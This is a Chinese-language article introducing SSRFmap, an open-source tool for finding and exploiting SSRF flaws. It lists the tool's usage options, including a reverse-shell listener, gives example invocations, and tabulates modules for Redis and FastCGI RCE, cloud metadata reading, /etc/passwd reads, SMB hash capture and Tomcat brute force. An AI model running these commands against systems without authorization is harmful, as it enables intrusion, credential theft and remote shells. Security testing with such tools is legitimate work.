摘要: SSRFmap:一款功能强大的自动化SSRF模糊测试&漏洞利用工具
SSRF,即服务器端请求伪造,很多网络犯罪分子都会利用SSRF来攻击或入侵网络服务。今天我们给大家介绍的这款工具名叫SSRFmap,它可以寻找并利用目标网络服务中的SSRF漏洞。
SSRFmap以Burp请求文件作为输入,研究人员可以利用参数选项来控制模糊测试的操作进程。
SSRFmap:【GitHub传送门】
大家可以直接从GitHub代码库中克隆该项目至本地:
git clone https://github.com/swisskyrepo/SSRFmap cd SSRFmap/ python3 ssrfmap.py usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [-l [HANDLER]] [-v [VERBOSE]] [--lhost LHOST] [--lport LPORT] [--uagent USERAGENT] [--ssl [SSL]] [--level [LEVEL]] optional arguments: -h, --help show this help message and exit -r REQFILE SSRF Request file -p PARAM SSRF Parameter to target -m MODULES SSRF Modules to enable -l [HANDLER] Start an handler for a reverse shell -v [VERBOSE] Enable verbosity --lhost LHOST LHOST reverse shell --lport LPORT LPORT reverse shell --uagent USERAGENT User Agent to use --ssl [SSL] Use HTTPS without verification --level [LEVEL] Level of test to perform (1-5, default: 1)
SSRFmap的默认使用方法如下:
Examples: python ssrfmap.py -r data/request2.txt -p url -m portscan python ssrfmap.py -r data/request.txt -p url -m redis python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent" python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
大姐可以使用data/example.py来测试框架是否能够正常运行:
FLASK_APP=data/example.pyflask run & python ssrfmap.py -r data/request.txt -p url -m readfiles
SSRFmap已整合了下列功能模块,大家可以使用-m参数来选择使用:
模块名称 | 模块描述 |
---|---|
fastcgi | FastCGI RCE |
redis | Redis RCE |
github | Github企业版RCE < 2.8.7 |
zabbix | Zabbix RCE |
mysql | MySQL命令执行 |
docker | Docker Infoleaks(API) |
smtp | SMTP邮件发送 |
Portscan | 主机端口扫描 |
networkscan | HTTP Ping sweep |
readfiles | 文件读取,例如/etc/passwd |
alibaba | 从供应商处读取文件 (例如: meta-data, user-data) |
aws | 从供应商处读取文件 (例如: meta-data, user-data) |
gce | 从供应商处读取文件 (例如: meta-data, user-data) |
digitalocean | 从供应商处读取文件 (例如: meta-data, user-data) |
socksproxy | SOCKS4 代理 |
smbhash | 通过UNC Path破解SMB认证 |
tomcat | 爆破Tomcat Manager |
如果各位想针对特定服务添加自己的功能模块,可以参考下面这个模板代码:
原文地址:https://www.freebuf.com/sectool/197353.html